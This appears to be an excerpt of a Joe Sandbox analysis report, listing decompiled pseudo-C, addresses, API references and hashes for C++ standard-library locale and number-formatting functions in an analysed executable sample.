                                                                                                                                    • Opcode ID: eeec2bdad2207886f8df3511a8ba4de4c277ab2d5a564916871e336d70c9c6c8
                                                                                                                                    • Instruction ID: a7b0c234b83362351ac5d69e5a995b0d5f863d924720fbfb942eb6b66f75acb2
                                                                                                                                    • Opcode Fuzzy Hash: eeec2bdad2207886f8df3511a8ba4de4c277ab2d5a564916871e336d70c9c6c8
                                                                                                                                    • Instruction Fuzzy Hash: 1F114F71D44248AADB10EFA0C991FEDB774AB04344F14807BE9067B2D2DB7C6A49DB1A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E004075E6(void* __eflags) {
                                                                                                                                    				intOrPtr _t40;
                                                                                                                                    				intOrPtr _t43;
                                                                                                                                    				void* _t45;
                                                                                                                                    
                                                                                                                                    				E004097B4(E0041C2A0, _t45);
                                                                                                                                    				E0040890D(_t45 - 0x14, 0);
                                                                                                                                    				_t43 =  *0x60e9bc; // 0x0
                                                                                                                                    				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
                                                                                                                                    				 *((intOrPtr*)(_t45 - 0x10)) = _t43;
                                                                                                                                    				_t40 = E004044C7( *((intOrPtr*)(_t45 + 8)), E004043C0(0x60e9c4));
                                                                                                                                    				if(_t40 == 0) {
                                                                                                                                    					if(_t43 == 0) {
                                                                                                                                    						_push( *((intOrPtr*)(_t45 + 8)));
                                                                                                                                    						_push(_t45 - 0x10);
                                                                                                                                    						if(E00407272() == 0xffffffff) {
                                                                                                                                    							E004091D1(_t45 - 0x20, "bad cast");
                                                                                                                                    							E00409853(_t45 - 0x20, 0x41e878);
                                                                                                                                    						}
                                                                                                                                    						_t40 =  *((intOrPtr*)(_t45 - 0x10));
                                                                                                                                    						 *0x60e9bc = _t40;
                                                                                                                                    						E004043F5(_t40);
                                                                                                                                    						E00404458();
                                                                                                                                    					} else {
                                                                                                                                    						_t40 = _t43;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
                                                                                                                                    				E00408935(_t45 - 0x14);
                                                                                                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
                                                                                                                                    				return _t40;
                                                                                                                                    			}






                                                                                                                                    0x004075eb
                                                                                                                                    0x004075fa
                                                                                                                                    0x004075ff
                                                                                                                                    0x00407605
                                                                                                                                    0x0040760e
                                                                                                                                    0x0040761f
                                                                                                                                    0x00407623
                                                                                                                                    0x00407627
                                                                                                                                    0x0040762d
                                                                                                                                    0x00407633
                                                                                                                                    0x0040763e
                                                                                                                                    0x00407648
                                                                                                                                    0x00407656
                                                                                                                                    0x00407656
                                                                                                                                    0x0040765b
                                                                                                                                    0x00407660
                                                                                                                                    0x00407666
                                                                                                                                    0x0040766d
                                                                                                                                    0x00407629
                                                                                                                                    0x00407629
                                                                                                                                    0x00407629
                                                                                                                                    0x00407627
                                                                                                                                    0x00407672
                                                                                                                                    0x00407679
                                                                                                                                    0x00407685
                                                                                                                                    0x0040768d

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 004075EB
                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004075FA
                                                                                                                                    • int.LIBCPMT ref: 00407611
                                                                                                                                      • Part of subcall function 004043C0: std::_Lockit::_Lockit.LIBCPMT ref: 004043D1
                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 00407648
                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00407656
                                                                                                                                    • std::locale::facet::_Incref.LIBCPMT ref: 00407666
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LockitLockit::_std::_$Exception@8H_prologIncrefThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                                    • String ID: bad cast
                                                                                                                                    • API String ID: 2140829718-3145022300
                                                                                                                                    • Opcode ID: 064e6208f4c168a85c758f56b2203d4f15991255ca0b3e9178892e7a2210ecec
                                                                                                                                    • Instruction ID: ef104af939d0ef76e7d6d2482b3880d7e253b794704a9dec1f4ddb05f606d898
                                                                                                                                    • Opcode Fuzzy Hash: 064e6208f4c168a85c758f56b2203d4f15991255ca0b3e9178892e7a2210ecec
                                                                                                                                    • Instruction Fuzzy Hash: AF11A372E005149BCF04FBA5C952AAEB735AB80324F10493FE522772D1CF3C9905CB99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E0040768E(void* __edx, void* __eflags) {
                                                                                                                                    				intOrPtr _t41;
                                                                                                                                    				intOrPtr _t44;
                                                                                                                                    				void* _t46;
                                                                                                                                    
                                                                                                                                    				E004097B4(E0041C2A0, _t46);
                                                                                                                                    				E0040890D(_t46 - 0x14, 0);
                                                                                                                                    				_t44 =  *0x60e9c0; // 0x0
                                                                                                                                    				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                                                                                                                                    				 *((intOrPtr*)(_t46 - 0x10)) = _t44;
                                                                                                                                    				_t41 = E004044C7( *((intOrPtr*)(_t46 + 8)), E004043C0(0x60e9c8));
                                                                                                                                    				if(_t41 == 0) {
                                                                                                                                    					if(_t44 == 0) {
                                                                                                                                    						_push( *((intOrPtr*)(_t46 + 8)));
                                                                                                                                    						_push(_t46 - 0x10);
                                                                                                                                    						if(E00407319(__edx) == 0xffffffff) {
                                                                                                                                    							E004091D1(_t46 - 0x20, "bad cast");
                                                                                                                                    							E00409853(_t46 - 0x20, 0x41e878);
                                                                                                                                    						}
                                                                                                                                    						_t41 =  *((intOrPtr*)(_t46 - 0x10));
                                                                                                                                    						 *0x60e9c0 = _t41;
                                                                                                                                    						E004043F5(_t41);
                                                                                                                                    						E00404458();
                                                                                                                                    					} else {
                                                                                                                                    						_t41 = _t44;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				 *(_t46 - 4) =  *(_t46 - 4) | 0xffffffff;
                                                                                                                                    				E00408935(_t46 - 0x14);
                                                                                                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
                                                                                                                                    				return _t41;
                                                                                                                                    			}






                                                                                                                                    0x00407693
                                                                                                                                    0x004076a2
                                                                                                                                    0x004076a7
                                                                                                                                    0x004076ad
                                                                                                                                    0x004076b6
                                                                                                                                    0x004076c7
                                                                                                                                    0x004076cb
                                                                                                                                    0x004076cf
                                                                                                                                    0x004076d5
                                                                                                                                    0x004076db
                                                                                                                                    0x004076e6
                                                                                                                                    0x004076f0
                                                                                                                                    0x004076fe
                                                                                                                                    0x004076fe
                                                                                                                                    0x00407703
                                                                                                                                    0x00407708
                                                                                                                                    0x0040770e
                                                                                                                                    0x00407715
                                                                                                                                    0x004076d1
                                                                                                                                    0x004076d1
                                                                                                                                    0x004076d1
                                                                                                                                    0x004076cf
                                                                                                                                    0x0040771a
                                                                                                                                    0x00407721
                                                                                                                                    0x0040772d
                                                                                                                                    0x00407735

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00407693
                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004076A2
                                                                                                                                    • int.LIBCPMT ref: 004076B9
                                                                                                                                      • Part of subcall function 004043C0: std::_Lockit::_Lockit.LIBCPMT ref: 004043D1
                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 004076F0
                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 004076FE
                                                                                                                                    • std::locale::facet::_Incref.LIBCPMT ref: 0040770E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LockitLockit::_std::_$Exception@8H_prologIncrefThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                                    • String ID: bad cast
                                                                                                                                    • API String ID: 2140829718-3145022300
                                                                                                                                    • Opcode ID: db3fe0e4b773b5ce223fd2707b006bb8da32ab989ee6b5e8e6be3302747f701e
                                                                                                                                    • Instruction ID: c466c3a4d3c266b7bea24ca3fd0d35a23866e0a4417ecbda8611eb3caf7ce045
                                                                                                                                    • Opcode Fuzzy Hash: db3fe0e4b773b5ce223fd2707b006bb8da32ab989ee6b5e8e6be3302747f701e
                                                                                                                                    • Instruction Fuzzy Hash: D911A072E001159BCB05FBA5D842AAE7735AB80368F100A3FE412772D2DF3CAA05C799
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E00407903(void* __edx, void* __eflags) {
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				void* _t183;
                                                                                                                                    				intOrPtr _t184;
                                                                                                                                    				char _t187;
                                                                                                                                    				char _t190;
                                                                                                                                    				void* _t191;
                                                                                                                                    				signed int _t197;
                                                                                                                                    				intOrPtr _t199;
                                                                                                                                    				void* _t201;
                                                                                                                                    				signed int _t203;
                                                                                                                                    				void* _t205;
                                                                                                                                    				void* _t206;
                                                                                                                                    				intOrPtr* _t208;
                                                                                                                                    				intOrPtr* _t210;
                                                                                                                                    				intOrPtr* _t220;
                                                                                                                                    				intOrPtr* _t222;
                                                                                                                                    				signed char _t225;
                                                                                                                                    				char* _t226;
                                                                                                                                    				intOrPtr* _t228;
                                                                                                                                    				signed int _t230;
                                                                                                                                    				intOrPtr* _t235;
                                                                                                                                    				intOrPtr* _t237;
                                                                                                                                    				intOrPtr* _t241;
                                                                                                                                    				intOrPtr* _t243;
                                                                                                                                    				intOrPtr* _t246;
                                                                                                                                    				intOrPtr* _t249;
                                                                                                                                    				void* _t252;
                                                                                                                                    				void* _t253;
                                                                                                                                    				signed int _t261;
                                                                                                                                    				signed int _t262;
                                                                                                                                    				signed int _t264;
                                                                                                                                    				char* _t266;
                                                                                                                                    				void* _t303;
                                                                                                                                    				void* _t317;
                                                                                                                                    				signed int _t318;
                                                                                                                                    				intOrPtr* _t321;
                                                                                                                                    				void* _t325;
                                                                                                                                    				void* _t328;
                                                                                                                                    				intOrPtr* _t331;
                                                                                                                                    				void* _t332;
                                                                                                                                    				signed int _t334;
                                                                                                                                    				void* _t336;
                                                                                                                                    				void* _t337;
                                                                                                                                    				void* _t339;
                                                                                                                                    				void* _t341;
                                                                                                                                    				void* _t342;
                                                                                                                                    				void* _t343;
                                                                                                                                    				void* _t344;
                                                                                                                                    				void* _t348;
                                                                                                                                    				void* _t350;
                                                                                                                                    
                                                                                                                                    				_t350 = __eflags;
                                                                                                                                    				E004097B4(E0041C2FE, _t337);
                                                                                                                                    				_push(_t317);
                                                                                                                                    				_t183 = E004045B4( *((intOrPtr*)(_t337 + 0x18)), _t337 - 0x20);
                                                                                                                                    				 *(_t337 - 4) =  *(_t337 - 4) & 0x00000000;
                                                                                                                                    				_push(_t183);
                                                                                                                                    				_t184 = E0040768E(__edx, _t350);
                                                                                                                                    				 *(_t337 - 4) =  *(_t337 - 4) | 0xffffffff;
                                                                                                                                    				 *((intOrPtr*)(_t337 - 0x18)) = _t184;
                                                                                                                                    				E004044AF(_t337 - 0x20);
                                                                                                                                    				_t187 = E00406B48( *((intOrPtr*)(_t337 - 0x18)), _t337 - 0x60);
                                                                                                                                    				 *(_t337 - 4) = 1;
                                                                                                                                    				E00405F44();
                                                                                                                                    				 *((char*)(_t337 - 0x1c)) = _t187;
                                                                                                                                    				E00406924(_t337 - 0x44, _t317);
                                                                                                                                    				_t270 =  *(_t337 + 8);
                                                                                                                                    				_push( *(_t337 + 8) + 8);
                                                                                                                                    				_push(0);
                                                                                                                                    				 *(_t337 - 4) = 2;
                                                                                                                                    				_t190 = E00405FA3(0x30);
                                                                                                                                    				_t318 =  *(_t337 + 0x20);
                                                                                                                                    				 *((char*)(_t337 - 0x14)) = _t190;
                                                                                                                                    				_t191 =  *_t318;
                                                                                                                                    				_t341 = _t339 - 0x54 + 0xc;
                                                                                                                                    				if(_t191 == 0x2b || _t191 == 0x2d) {
                                                                                                                                    					 *(_t337 + 0x20) = 1;
                                                                                                                                    				} else {
                                                                                                                                    					 *(_t337 + 0x20) =  *(_t337 + 0x20) & 0x00000000;
                                                                                                                                    				}
                                                                                                                                    				 *((char*)(_t337 - 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(E00409B2A()))));
                                                                                                                                    				 *((char*)(_t337 - 0xf)) = 0x65;
                                                                                                                                    				 *((char*)(_t337 - 0xe)) = 0;
                                                                                                                                    				_t325 = E00409B50(_t318, 0x65,  *((intOrPtr*)(_t337 + 0x30)));
                                                                                                                                    				_t197 = E00409B50(_t318,  *((char*)(_t337 - 0x10)),  *((intOrPtr*)(_t337 + 0x30)));
                                                                                                                                    				_t342 = _t341 + 0x18;
                                                                                                                                    				 *(_t337 + 8) = _t197;
                                                                                                                                    				if(_t197 == 0) {
                                                                                                                                    					 *(_t337 + 0x2c) =  *(_t337 + 0x2c) & _t197;
                                                                                                                                    				}
                                                                                                                                    				_t199 =  *((intOrPtr*)(L00405FDE(_t337 - 0x60)));
                                                                                                                                    				if(_t199 == 0x7f) {
                                                                                                                                    					L23:
                                                                                                                                    					_t328 =  *(_t337 + 0x24) +  *(_t337 + 0x28) +  *(_t337 + 0x2c) +  *((intOrPtr*)(_t337 + 0x30));
                                                                                                                                    					_t201 = E00405E04( *((intOrPtr*)(_t337 + 0x18)));
                                                                                                                                    					if(_t201 <= 0 || _t201 <= _t328) {
                                                                                                                                    						_t73 = _t337 + 8;
                                                                                                                                    						 *_t73 =  *(_t337 + 8) & 0x00000000;
                                                                                                                                    						__eflags =  *_t73;
                                                                                                                                    					} else {
                                                                                                                                    						 *(_t337 + 8) = _t201 - _t328;
                                                                                                                                    					}
                                                                                                                                    					_t203 = E004045B0( *((intOrPtr*)(_t337 + 0x18))) & 0x000001c0;
                                                                                                                                    					if(_t203 != 0x40) {
                                                                                                                                    						if(_t203 == 0x100 &&  *(_t337 + 0x20) > 0) {
                                                                                                                                    							_t249 = E004067AC(_t270, _t337 - 0x28,  *((intOrPtr*)(_t337 + 0x10)),  *(_t337 + 0x14), _t318, 1);
                                                                                                                                    							_t342 = _t342 + 0x18;
                                                                                                                                    							 *((intOrPtr*)(_t337 + 0x10)) =  *_t249;
                                                                                                                                    							_t318 = _t318 + 1;
                                                                                                                                    							 *((intOrPtr*)(_t337 + 0x30)) =  *((intOrPtr*)(_t337 + 0x30)) - 1;
                                                                                                                                    							 *(_t337 + 0x14) =  *(_t249 + 4);
                                                                                                                                    						}
                                                                                                                                    						_t246 = E0040668C(_t270, _t337 - 0x28,  *((intOrPtr*)(_t337 + 0x10)),  *(_t337 + 0x14),  *((intOrPtr*)(_t337 + 0x1c)),  *(_t337 + 8));
                                                                                                                                    						 *((intOrPtr*)(_t337 + 0x10)) =  *_t246;
                                                                                                                                    						_t342 = _t342 + 0x18;
                                                                                                                                    						 *(_t337 + 8) =  *(_t337 + 8) & 0x00000000;
                                                                                                                                    						 *(_t337 + 0x14) =  *(_t246 + 4);
                                                                                                                                    					}
                                                                                                                                    					_t205 = E00409B50(_t318,  *((char*)(_t337 - 0x10)),  *((intOrPtr*)(_t337 + 0x30)));
                                                                                                                                    					_t343 = _t342 + 0xc;
                                                                                                                                    					if(_t205 != 0) {
                                                                                                                                    						_t332 = _t205 - _t318 + 1;
                                                                                                                                    						_t98 = _t332 - 1; // 0x0
                                                                                                                                    						_t235 = E00406802(_t270, _t337 - 0x28,  *((intOrPtr*)(_t337 + 0x10)),  *(_t337 + 0x14), _t318, _t98,  *((intOrPtr*)(_t337 - 0x1c)));
                                                                                                                                    						 *((intOrPtr*)(_t337 + 0x10)) =  *_t235;
                                                                                                                                    						 *(_t337 + 0x14) =  *(_t235 + 4);
                                                                                                                                    						_t237 = E0040668C(_t270, _t337 - 0x28,  *_t235,  *(_t235 + 4),  *((intOrPtr*)(_t337 - 0x14)),  *(_t337 + 0x24));
                                                                                                                                    						 *((intOrPtr*)(_t337 + 0x10)) =  *_t237;
                                                                                                                                    						 *(_t337 + 0x14) =  *(_t237 + 4);
                                                                                                                                    						E00405F3F();
                                                                                                                                    						_t241 = E0040668C(_t270, _t337 - 0x28,  *((intOrPtr*)(_t337 + 0x10)),  *(_t337 + 0x14),  *(_t237 + 4) & 0x000000ff, 1);
                                                                                                                                    						 *((intOrPtr*)(_t337 + 0x10)) =  *_t241;
                                                                                                                                    						 *(_t337 + 0x14) =  *(_t241 + 4);
                                                                                                                                    						_t243 = E0040668C(_t270, _t337 - 0x28,  *_t241,  *(_t241 + 4),  *((intOrPtr*)(_t337 - 0x14)),  *(_t337 + 0x28));
                                                                                                                                    						 *((intOrPtr*)(_t337 + 0x10)) =  *_t243;
                                                                                                                                    						_t343 = _t343 + 0x64;
                                                                                                                                    						_t318 = _t318 + _t332;
                                                                                                                                    						 *((intOrPtr*)(_t337 + 0x30)) =  *((intOrPtr*)(_t337 + 0x30)) - _t332;
                                                                                                                                    						 *(_t337 + 0x14) =  *(_t243 + 4);
                                                                                                                                    					}
                                                                                                                                    					_t206 = E00409B50(_t318, 0x65,  *((intOrPtr*)(_t337 + 0x30)));
                                                                                                                                    					_t344 = _t343 + 0xc;
                                                                                                                                    					if(_t206 != 0) {
                                                                                                                                    						 *(_t337 + 0x24) = _t206 - _t318 + 1;
                                                                                                                                    						_t220 = E00406802(_t270, _t337 - 0x28,  *((intOrPtr*)(_t337 + 0x10)),  *(_t337 + 0x14), _t318, _t206 - _t318 + 1 - 1,  *((intOrPtr*)(_t337 - 0x1c)));
                                                                                                                                    						 *((intOrPtr*)(_t337 + 0x10)) =  *_t220;
                                                                                                                                    						 *(_t337 + 0x14) =  *(_t220 + 4);
                                                                                                                                    						_t222 = E0040668C(_t270, _t337 - 0x28,  *_t220,  *(_t220 + 4),  *((intOrPtr*)(_t337 - 0x14)),  *(_t337 + 0x2c));
                                                                                                                                    						 *(_t337 + 0x2c) =  *(_t337 + 0x2c) & 0x00000000;
                                                                                                                                    						_t331 = _t222;
                                                                                                                                    						 *((intOrPtr*)(_t337 + 0x10)) =  *_t331;
                                                                                                                                    						_t348 = _t344 + 0x34;
                                                                                                                                    						 *(_t337 + 0x14) =  *(_t331 + 4);
                                                                                                                                    						_t225 = E004045B0( *((intOrPtr*)(_t337 + 0x18)));
                                                                                                                                    						_t226 = "E";
                                                                                                                                    						if((_t225 & 0x00000004) == 0) {
                                                                                                                                    							_t226 = "e";
                                                                                                                                    						}
                                                                                                                                    						_t228 = E004067AC(_t270, _t337 - 0x28,  *_t331,  *(_t331 + 4), _t226, 1);
                                                                                                                                    						 *((intOrPtr*)(_t337 + 0x10)) =  *_t228;
                                                                                                                                    						 *(_t337 + 0x14) =  *(_t228 + 4);
                                                                                                                                    						_t230 =  *(_t337 + 0x24);
                                                                                                                                    						_t344 = _t348 + 0x18;
                                                                                                                                    						_t318 = _t318 + _t230;
                                                                                                                                    						 *((intOrPtr*)(_t337 + 0x30)) =  *((intOrPtr*)(_t337 + 0x30)) - _t230;
                                                                                                                                    					}
                                                                                                                                    					_t208 = E00406802(_t270, _t337 - 0x28,  *((intOrPtr*)(_t337 + 0x10)),  *(_t337 + 0x14), _t318,  *((intOrPtr*)(_t337 + 0x30)),  *((intOrPtr*)(_t337 - 0x1c)));
                                                                                                                                    					 *((intOrPtr*)(_t337 + 0x10)) =  *_t208;
                                                                                                                                    					 *(_t337 + 0x14) =  *(_t208 + 4);
                                                                                                                                    					_t210 = E0040668C(_t270, _t337 - 0x28,  *_t208,  *(_t208 + 4),  *((intOrPtr*)(_t337 - 0x14)),  *(_t337 + 0x2c));
                                                                                                                                    					 *((intOrPtr*)(_t337 + 0x10)) =  *_t210;
                                                                                                                                    					 *(_t337 + 0x14) =  *(_t210 + 4);
                                                                                                                                    					E00405E08( *((intOrPtr*)(_t337 + 0x18)), 0);
                                                                                                                                    					E0040668C(_t270,  *((intOrPtr*)(_t337 + 0xc)),  *_t210,  *(_t210 + 4),  *((intOrPtr*)(_t337 + 0x1c)),  *(_t337 + 8));
                                                                                                                                    					E00406945();
                                                                                                                                    					E00406945();
                                                                                                                                    					 *[fs:0x0] =  *((intOrPtr*)(_t337 - 0xc));
                                                                                                                                    					return  *((intOrPtr*)(_t337 + 0xc));
                                                                                                                                    				} else {
                                                                                                                                    					_t356 = _t199;
                                                                                                                                    					if(_t199 <= 0) {
                                                                                                                                    						goto L23;
                                                                                                                                    					}
                                                                                                                                    					_t252 = E00406E1B(_t337 - 0x44, _t356, _t318,  *((intOrPtr*)(_t337 + 0x30)));
                                                                                                                                    					if(_t325 != 0) {
                                                                                                                                    						__eflags =  *(_t337 + 8);
                                                                                                                                    						if( *(_t337 + 8) == 0) {
                                                                                                                                    							E00406A6E(_t252, _t337 - 0x44, _t325,  *(_t337 + 0x24), 0x30);
                                                                                                                                    							_t40 = _t337 + 0x24;
                                                                                                                                    							 *_t40 =  *(_t337 + 0x24) & 0x00000000;
                                                                                                                                    							__eflags =  *_t40;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t325 - _t318;
                                                                                                                                    						_t253 = E00406ABE(_t337 - 0x44, _t318, _t325 - _t318,  *(_t337 + 0x2c), 0x30);
                                                                                                                                    					} else {
                                                                                                                                    						_t253 = E00406A6E(_t252, _t337 - 0x44, _t325,  *(_t337 + 0x2c), 0x30);
                                                                                                                                    					}
                                                                                                                                    					_t334 =  *(_t337 + 8);
                                                                                                                                    					_push(0x30);
                                                                                                                                    					_t303 = _t337 - 0x44;
                                                                                                                                    					if(_t334 != 0) {
                                                                                                                                    						_push( *(_t337 + 0x28));
                                                                                                                                    						_t48 = _t334 - _t318 + 1; // 0x1
                                                                                                                                    						E00406ABE(_t303, _t318);
                                                                                                                                    						E00406ABE(_t337 - 0x44, _t318, _t334 - _t318,  *(_t337 + 0x24), 0x30);
                                                                                                                                    						_t51 = _t337 + 0x28;
                                                                                                                                    						 *_t51 =  *(_t337 + 0x28) & 0x00000000;
                                                                                                                                    						__eflags =  *_t51;
                                                                                                                                    					} else {
                                                                                                                                    						_push( *(_t337 + 0x24));
                                                                                                                                    						E00406A6E(_t253, _t303, _t334);
                                                                                                                                    					}
                                                                                                                                    					 *(_t337 + 0x24) =  *(_t337 + 0x24) & 0x00000000;
                                                                                                                                    					_t321 = L00405FDE(_t337 - 0x60);
                                                                                                                                    					_t336 = E00409C00(_t337 - 0x44, E00405F1C(_t337 - 0x44, 0), _t337 - 0x10);
                                                                                                                                    					while(1) {
                                                                                                                                    						_t261 =  *_t321;
                                                                                                                                    						if(_t261 == 0x7f) {
                                                                                                                                    							break;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t261;
                                                                                                                                    						if(_t261 <= 0) {
                                                                                                                                    							break;
                                                                                                                                    						}
                                                                                                                                    						_t264 = _t261;
                                                                                                                                    						__eflags = _t264 - _t336 -  *(_t337 + 0x20);
                                                                                                                                    						if(_t264 >= _t336 -  *(_t337 + 0x20)) {
                                                                                                                                    							break;
                                                                                                                                    						}
                                                                                                                                    						_t336 = _t336 - _t264;
                                                                                                                                    						E00406ABE(_t337 - 0x44, _t321, _t336, 1, 0);
                                                                                                                                    						_t60 = _t321 + 1; // 0x1
                                                                                                                                    						_t266 = _t60;
                                                                                                                                    						__eflags =  *_t266;
                                                                                                                                    						if( *_t266 > 0) {
                                                                                                                                    							_t321 = _t266;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					_t262 = E00405F1C(_t337 - 0x44, 0);
                                                                                                                                    					 *(_t337 + 0x2c) =  *(_t337 + 0x2c) & 0x00000000;
                                                                                                                                    					_t318 = _t262;
                                                                                                                                    					 *((intOrPtr*)(_t337 + 0x30)) = E00404F95(_t337 - 0x44);
                                                                                                                                    					goto L23;
                                                                                                                                    				}
                                                                                                                                    			}






















































                                                                                                                                    0x00407903
                                                                                                                                    0x00407908
                                                                                                                                    0x00407915
                                                                                                                                    0x0040791a
                                                                                                                                    0x0040791f
                                                                                                                                    0x00407923
                                                                                                                                    0x00407924
                                                                                                                                    0x00407929
                                                                                                                                    0x00407931
                                                                                                                                    0x00407934
                                                                                                                                    0x00407940
                                                                                                                                    0x0040794b
                                                                                                                                    0x0040794e
                                                                                                                                    0x00407956
                                                                                                                                    0x00407959
                                                                                                                                    0x0040795e
                                                                                                                                    0x00407964
                                                                                                                                    0x00407965
                                                                                                                                    0x00407969
                                                                                                                                    0x0040796d
                                                                                                                                    0x00407972
                                                                                                                                    0x00407975
                                                                                                                                    0x00407978
                                                                                                                                    0x0040797a
                                                                                                                                    0x0040797f
                                                                                                                                    0x0040798b
                                                                                                                                    0x00407985
                                                                                                                                    0x00407985
                                                                                                                                    0x00407985
                                                                                                                                    0x0040799d
                                                                                                                                    0x004079a0
                                                                                                                                    0x004079a4
                                                                                                                                    0x004079b0
                                                                                                                                    0x004079b8
                                                                                                                                    0x004079bd
                                                                                                                                    0x004079c0
                                                                                                                                    0x004079c5
                                                                                                                                    0x004079c7
                                                                                                                                    0x004079c7
                                                                                                                                    0x004079d2
                                                                                                                                    0x004079d6
                                                                                                                                    0x00407ad2
                                                                                                                                    0x00407ae1
                                                                                                                                    0x00407ae4
                                                                                                                                    0x00407aeb
                                                                                                                                    0x00407af8
                                                                                                                                    0x00407af8
                                                                                                                                    0x00407af8
                                                                                                                                    0x00407af1
                                                                                                                                    0x00407af3
                                                                                                                                    0x00407af3
                                                                                                                                    0x00407b04
                                                                                                                                    0x00407b0c
                                                                                                                                    0x00407b13
                                                                                                                                    0x00407b29
                                                                                                                                    0x00407b30
                                                                                                                                    0x00407b33
                                                                                                                                    0x00407b39
                                                                                                                                    0x00407b3a
                                                                                                                                    0x00407b3d
                                                                                                                                    0x00407b3d
                                                                                                                                    0x00407b51
                                                                                                                                    0x00407b58
                                                                                                                                    0x00407b5e
                                                                                                                                    0x00407b61
                                                                                                                                    0x00407b65
                                                                                                                                    0x00407b65
                                                                                                                                    0x00407b71
                                                                                                                                    0x00407b76
                                                                                                                                    0x00407b7b
                                                                                                                                    0x00407b87
                                                                                                                                    0x00407b89
                                                                                                                                    0x00407b99
                                                                                                                                    0x00407ba3
                                                                                                                                    0x00407bac
                                                                                                                                    0x00407bb9
                                                                                                                                    0x00407bc0
                                                                                                                                    0x00407bce
                                                                                                                                    0x00407bd1
                                                                                                                                    0x00407be5
                                                                                                                                    0x00407bef
                                                                                                                                    0x00407bf8
                                                                                                                                    0x00407c05
                                                                                                                                    0x00407c0c
                                                                                                                                    0x00407c12
                                                                                                                                    0x00407c15
                                                                                                                                    0x00407c17
                                                                                                                                    0x00407c1a
                                                                                                                                    0x00407c1a
                                                                                                                                    0x00407c23
                                                                                                                                    0x00407c28
                                                                                                                                    0x00407c2d
                                                                                                                                    0x00407c39
                                                                                                                                    0x00407c4a
                                                                                                                                    0x00407c54
                                                                                                                                    0x00407c5d
                                                                                                                                    0x00407c6a
                                                                                                                                    0x00407c72
                                                                                                                                    0x00407c76
                                                                                                                                    0x00407c7a
                                                                                                                                    0x00407c80
                                                                                                                                    0x00407c83
                                                                                                                                    0x00407c86
                                                                                                                                    0x00407c8d
                                                                                                                                    0x00407c92
                                                                                                                                    0x00407c94
                                                                                                                                    0x00407c94
                                                                                                                                    0x00407ca6
                                                                                                                                    0x00407cad
                                                                                                                                    0x00407cb3
                                                                                                                                    0x00407cb6
                                                                                                                                    0x00407cb9
                                                                                                                                    0x00407cbc
                                                                                                                                    0x00407cbe
                                                                                                                                    0x00407cbe
                                                                                                                                    0x00407cd3
                                                                                                                                    0x00407cdd
                                                                                                                                    0x00407ce6
                                                                                                                                    0x00407cf3
                                                                                                                                    0x00407d00
                                                                                                                                    0x00407d08
                                                                                                                                    0x00407d0b
                                                                                                                                    0x00407d1c
                                                                                                                                    0x00407d27
